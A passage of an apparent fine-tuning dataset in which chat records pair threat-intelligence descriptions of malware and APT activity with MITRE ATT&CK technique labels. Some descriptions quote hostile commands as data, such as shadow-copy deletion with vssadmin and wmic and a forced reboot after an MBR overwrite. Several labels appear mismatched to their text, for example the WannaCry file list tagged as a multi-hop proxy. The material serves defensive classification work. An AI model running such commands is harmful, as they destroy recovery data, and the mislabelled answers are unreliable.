"assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Background From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE, a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control (C2) server" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kwampirs collects network adapter and interface information by using the commands \"ipconfig /all\", \"arp -a\" and \"route print\". It also collects the system's MAC address with \"getmac\" and domain configuration with \"net config workstation\"." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QuasarRAT can use port 4782 on the compromised host for TCP callbacks." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors discovered the local disks attached to the system and their hardware information including manufacturer and model, as well as the OS versions of systems connected to a targeted network." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TAINTEDSCRIBE has used FakeTLS for session authentication." }, { "role": "assistant", "content": "T1001.003 - Protocol or Service Impersonation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware contains 1 function, the purpose is to open the drive of the infected system (\\\\.\\PhysicalDrive0) and write the following data to the MBR: You can see the \"Are you Happy. After writing to the MBR, the malware reboots the machine with the following command: c:\\windows\\system32\\shutdown /r /t 1 After the reboot, the MBR displays the following string to the user: The link to the other campaigns was the following PDB path" }, { "role": "assistant", "content": "T1529 - System Shutdown/Reboot" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ebury can exfiltrate SSH credentials through custom DNS queries." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "However, while the malware used in these new attacks uses similar infection mechanisms to PlugX, it is a completely new tool with its own specific behavior patterns and architecture. We have named this tool “BBSRAT. Targeting and Infrastructure . As described in earlier reports on “Roaming Tiger”, the attack observed in August 2015 used weaponized exploit documents that leave Russian language decoy document files after infecting the system. Figure 2 confirms that the decoy document that opens after the malware infects the system is indeed a list of international exhibitions that were conducted on Russian territory in 2015. Analysis of the command and control (C2) infrastructure shows that the newly discovered samples of BBSRAT used the same C2 domains as previously published in the “Roaming Tiger” campaign, including transactiona[.]com and futuresgold[.]com. This may indicate that for the newer attack campaign using BBSRAT, the adversary may have deployed purpose-built variants and/or infrastructure for each of the intended targets. As we can see, the second command is specifically crafted to run on 64-bit versions of Microsoft Windows. Every subsequent request made by BBSRAT increments this counter by one. The following commands and sub-commands have been identified: Please refer to the appendix for a full list of identified BBSRAT samples and their associated C2 servers. Despite the fact that the information about these attackers has been public for over a year, including a listing of many of the command and control servers, they continue to reuse much of their exposed playbook" }, { "role": "assistant", "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The following code snippet was used to decode strings within OopsIE:out = \"\" for e in obfuscated_string.split(\"-\"): out += chr(int(e)-1)When first run, this OopsIE variant runs a variety of checks to avoid running in an analysis environment, as discussed in the previous section" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium can open random files and Registry keys to obscure malware behavior from sandbox analysis." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has exfiltrated files stolen from file shares." }, { "role": "assistant", "content": "T1039 - Data from Network Shared Drive" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In June 2015, a number of web portal email accounts were hacked, sending emails with malicious Hangul document files and phishing emails to steal portal account credentials. In January 2016, a large number of emails with malicious attachments were sent under the guise of ‘Office of National Security at the Blue House’ to government research institutes. Analysis by related organizations identified the malicious attachment as Kimsuky malware [3" }, { "role": "assistant", "content": "T1586.002 - Email Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used web services including OneHub to distribute remote access tools." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Felismus collects the current username and sends it to the C2 server." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShadowPad has injected an install module into a newly created process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An APT3 downloader establishes SOCKS5 connections for its initial C2." }, { "role": "assistant", "content": "T1090.002 - External Proxy', 'T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winexe installs a service on the remote system, executes the command, then uninstalls the service." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has tunneled RDP backdoors over port 443." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Finally, the malware changes the password of the local users. In the files analyzed, all the passwords chosen by the actor have the same pattern: Aa153" }, { "role": "assistant", "content": "T1531 - Account Access Removal" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Misdat has uploaded files and data to its C2 servers." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNBURST used VBScripts to initiate the execution of payloads." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The second part of API hooking hooks on “GetExtendedTcpTable. GetExtendedTcpTable” is used for retrieving a table that contains a list of TCP endpoints available to the application, and it is frequently used in some network-related commands, such as netstat. The purpose of the hook is to remove TCP endpoint records of certain PIDs. The second function, “GetRTTAndHopCount,” acts as the place to put the injected hooking code" }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fox Kitten has exploited known vulnerabilities in remote services including RDP." }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The example C2s used by older variants of Comnie demonstrates this: Figure 9 Old Comnie variants collecting C2 information Please refer to the Appendix for a script that may be used to decode C2 information from the older Comnie variants" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dtrack’s dropper contains a keylogging executable." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The APT1 group is known to have used pass the hash." }, { "role": "assistant", "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The January 2022 version of PlugX malware utilizes RC4 encryption along with a hardcoded key that is built dynamically. For communications, the data is compressed then encrypted before sending to the command and control (C2) server and the same process in reverse is implemented for data received from the C2 server. e@T#L$PH%\" as it is being passed along with the encrypted data. During the January 2022 campaigns, the delivered PlugX malware samples communicated with the C2 server 92.118.188[.]78 over port 187. In the February 2022 campaign, Proofpoint researchers observed a variation in which PlugX malware used an RC4 key that was sent to the bot in the first HTTP response which was then used to encrypt data going to the C2 server" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects information on network settings and Internet proxy settings from the victim." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "communicates via ICMP for C2." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has installed updates and new malware on victims." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT34 uses remote services such as VPN, Citrix, or OWA to persist in an environment." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil has used HTTP and HTTPS in communication with C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mandiant has created a task force & initiated a Global Event to track the Russian invasion of Ukraine. Department of State, hosted on a page made to look like another Department of State Public Affairs official's personal drive, and used a legitimate Department of State form as a decoy. There are several similarities and technical overlaps between the 14 November 2018, phishing campaign and the suspected APT29 phishing campaign on 9 November 2016, both of which occurred shortly after U.S. However, the new campaign included creative new elements as well as a seemingly deliberate reuse of old phishing tactics, techniques and procedures (TTPs), including using the same system to weaponize a Windows shortcut (LNK) file. It has also been over a year since we have conclusively identified APT29 activity, which raises questions about the timing and the similarities of the activity after such a long interlude. The shortcut file was crafted to execute a PowerShell command that read, decoded, and executed additional code from within the shortcut file. Previous APT29 activity targeted some of the same recipients of this email campaign, and APT29 has leveraged large waves of emails in previous campaigns. On execution, the PowerShell command extracted and executed the Cobalt Strike BEACON backdoor and decoy PDF. For example, the use of 'FromBase'+0x40+'String', in place of FromBase64String, the PowerShell command used to decode base64. The decoded command consisted of additional PowerShell that read the content of ds7002.lnk from offset 0x5e2be to offset 0x623b6, base64 decoded the extracted content, and executed it as additional PowerShell content" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ferocious can run anti-sandbox checks using the Microsoft Excel 4.0 function \"GET.WORKSPACE\" to determine the OS version, if there is a mouse present, and if the host is capable of playing sounds." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can create a shortcut in the Windows startup folder for persistence." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In rare cases, LockBit 2.0 has been observed to create accounts for persistence with simple names, such as `a.`" }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the victim's username." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can gather Registry values." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Javali has been delivered via malicious links embedded in e-mails." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KONNI can collect the username from the victim’s machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kwampirs uses rundll32.exe in a Registry value added to establish persistence." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RainyDay can use tools to collect credentials from web browsers." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Diavol can receive configuration updates and additional payloads including wscpy.exe from C2." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WhisperGate can use a Visual Basic script to exclude the `C:\\` drive from Windows Defender." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLEAD has the ability to list processes on the compromised host." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WINDSHIELD can gather the victim user name." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In one version of KeyBoy, string obfuscation routines were used to hide many of the critical values referenced in the malware." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can compress data with Zip before sending it over C2." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Meteor can use `bcdedit` to delete different boot identifiers on a compromised host; it can also use `vssadmin.exe delete shadows /all /quiet` and `C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe shadowcopy delete`." }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Consistent with the perceived goal of credential harvesting, the threat actors dropped and executed open source and free tools such as Hydra, SecretsDump, and CrackMapExec. Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system" }, { "role": "assistant", "content": "T1110.002 - Brute Force: Password Cracking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has used esentutl to change file extensions to their true type that were masquerading as .txt files." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Final1stspy creates a Registry Run key to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lizar can collect email accounts from Microsoft Outlook and Mozilla Thunderbird." }, { "role": "assistant", "content": "T1087.003 - Email Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ferocious Kitten has attempted to convince victims to enable malicious content within a spearphishing email by including an odd decoy message." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "b.wnry — Bitmap image used as desktop wallpaper (shown in Figure 2) - c.wnry — Configuration containing Tor command and control (C2) addresses, Bitcoin addresses, and other data - r.wnry — Ransom demand text - s.wnry — ZIP archive containing Tor software to be installed on the victim’s system; saved in TaskData directory - t.wnry — Encrypted DLL containing file-encryption functionality - u.wnry — Main module of the WCry ransomware “decryptor” - taskdl.exe — WNCRYT temporary file cleanup program - taskse.exe — Program that displays decryptor window to RDP sessions - msg — Directory containing Rich Text Format (RTF) ransom demands in multiple languages" }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Finally, OverWatch observed AQUATIC PANDA make multiple attempts at credential harvesting by dumping the memory of the LSASS process3 using living-off-the-land binaries rdrleakdiag.exe and cdump.exe — a renamed copy of createdump.exe. The threat actor used winRAR to compress the memory dump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the ProgramData and Windows\\temp\\ directories" }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory', 'T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shathak or TA551 is the name some security researchers have given to a specific distribution method that uses password-protected ZIP archives as attachments to malspam. It has used Word document templates targeting English-, Italian-, German- and Japanese-speaking recipients. Shathak/TA551 has been active at least as early as February 2019" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware’s next action is to check if the execute privilege is SYSTEM. When the execute privilege is SYSTEM, the malware will get the process “Explorer.exe”, get the token of the user that launched the process and impersonate it. It is a downgrade from SYSTEM to another user with less privileges to avoid affecting the desktop of the SYSTEM user later" }, { "role": "assistant", "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Commands received from the control server are encoded DWORDs - After decoding, these DWORDs should be in the range 123459h to 123490h" }, { "role": "assistant", "content": "T1132.002 - Non-Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Babuk has the ability to enumerate files on a targeted system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sibot can decrypt data received from a C2 and save to a file." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PsExec, a tool that has been used by adversaries, writes programs to the \"ADMIN$\" network share to execute commands on remote systems." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet has been observed encrypting the data it collects before sending it to the C2 server." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In response to historical disclosures detailing TA416 PlugX malware infection and encoding methods, the group appears to have adopted a rapid rate of development for their PlugX payloads. The group uses different legitimate PE files to initiate sideloading, as well as a variety of PlugX DLL loaders including the PotPlayer and DocCon versions noted in this publication. TA416 also uses different variants of the final PlugX payload in which the communication routines are observed to be different when closely analyzed. Additionally, the payload DAT file decryption method has evolved regularly since the beginning of 2022. Several observed decryption schemas and a sample configuration are included below with date ranges detailing the evolution of observed PlugX payloads" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to obtain information about services: \"net start >> %temp%\\download\"" }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mettle: A malicious campaign based on IP addresses in Vietnam (C2 210.245.26.180:4441, scanner 118.70.80.143) and mettle open source control module.. Hajime: This round of update from Hajime also includes GPON exploits.. Two Mirai variants: At least two malicious campaigns are actively exploiting this vulnerability to propagate mirai variants. The second one is already known as Omni.. Imgay: This looks like a botnet under development. We only observe its download behavior and no more follow-up actions." }, { "role": "assistant", "content": "T1588.006 - Vulnerabilities', 'T1587.004 - Exploits', 'T1203 - Exploitation for Client Execution', 'T1595.002 - Vulnerability Scanning" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used malware to obtain a list of running processes on the system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacMa can collect IP addresses from a compromised host." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can gather system information, the computer name, OS version, drive and serial information from the victim's machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbon uses the \"netstat -r\" and \"netstat -an\" commands." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Next, REvil checks the configuration field dbg to see if it’s running in debug mode. If that is not the case, geolocation checks based on the system’s language and the keyboard layout are conducted so the ransomware does not attempt to encrypt files on whitelisted systems. The following are whitelisted system language IDs for the analyzed sample" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT has the ability to overwrite scripts and delete itself if a sandbox environment is detected." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Andariel has inserted a malicious script within compromised websites to collect potential victim information such as browser type, system language, Flash Player version, and other data." }, { "role": "assistant", "content": "T1592.002 - Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Editor’s note: Following publication of this blog, it came to our attention that AhnLab encountered what appears to be an earlier version of SDBbot, described in their recent Q3 ASEC Report as a “malicious SDB file. AhnLab describes delivery of the malware in South Korean campaigns as a secondary payload to the FlawedAmmyy RAT. TA505 has been active in South Korea in 2019 and frequently distributes the FlawedAmmyy RAT, but we cannot verify the 